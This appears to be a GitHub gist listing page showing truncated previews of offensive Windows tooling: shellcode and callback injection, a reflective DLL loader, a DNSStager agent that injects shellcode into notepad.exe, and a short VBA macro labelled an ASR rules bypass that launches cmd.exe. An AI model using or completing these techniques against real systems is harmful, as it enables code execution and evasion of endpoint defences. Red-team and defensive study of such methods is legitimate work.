v4nyl
/ SysCall.cpp
Created
November 7, 2021 13:21
— forked from benpturner/SysCall.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <iostream> | |
| #include <windows.h> | |
| #include <psapi.h> | |
| typedef struct _PS_ATTRIBUTE { | |
| ULONG Attribute; | |
| SIZE_T Size; | |
| union { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Using the clipboard as your code cave. | |
| // Generate your shellcode with msfvenom or whatever | |
| // Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs | |
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace ClippySCInject | |
| { |
v4nyl
/ Win32_Callback_Inject.cs
Created
November 24, 2021 18:38
Win32 Callback Injection - 12 Methods
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| //Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover) | |
| namespace Callback_Inject | |
| { | |
| class Program | |
| { |
v4nyl
/ ReflectedDll.c
Created
December 20, 2021 19:48
— forked from Cracked5pider/ReflectedDll.c
Get output from injected reflected dll
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //===============================================================================================// | |
| // This is a stub for the actuall functionality of the DLL. | |
| //===============================================================================================// | |
| #include "ReflectiveLoader.h" | |
| #include <stdio.h> | |
| // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are | |
| // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own | |
| // DllMain and use the LoadRemoteLibraryR() API to inject this DLL. |
v4nyl
/ client-ipv6-generic.c
Created
February 1, 2022 19:22
— forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <inttypes.h> | |
| #include <winsock2.h> | |
| #include <windns.h> | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <tlhelp32.h> | |
v4nyl
/ ASR Rules Bypass.vba
Created
March 30, 2022 19:54
— forked from infosecn1nja/ASR Rules Bypass.vba
ASR rules bypass creating child processes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' ASR rules bypass creating child processes | |
| ' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
| ' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
| ' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
| Sub ASR_blocked() | |
| Dim WSHShell As Object | |
| Set WSHShell = CreateObject("Wscript.Shell") | |
| WSHShell.Run "cmd.exe" | |
| End Sub |
OlderNewer